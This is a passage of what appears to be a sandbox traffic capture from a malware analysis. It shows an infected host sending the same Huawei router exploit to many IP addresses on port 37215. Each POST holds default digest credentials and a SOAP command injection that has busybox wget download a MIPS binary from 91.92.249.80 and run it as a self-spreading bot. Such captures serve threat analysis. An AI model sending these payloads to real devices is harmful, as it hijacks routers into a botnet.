                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2473192.168.2.233958241.35.185.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710499048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2474192.168.2.2355238197.105.0.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710542917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2475192.168.2.235882441.183.250.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710556030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2476192.168.2.234931841.10.146.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710614920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2477192.168.2.2339216157.170.26.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710642099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2478192.168.2.2360336157.230.252.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710650921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2479192.168.2.234418480.76.193.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710666895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2480192.168.2.233966441.16.251.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710683107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2481192.168.2.2359142157.82.29.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710750103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2482192.168.2.2359282221.48.165.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710752964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2483192.168.2.234440841.29.102.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.710767984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
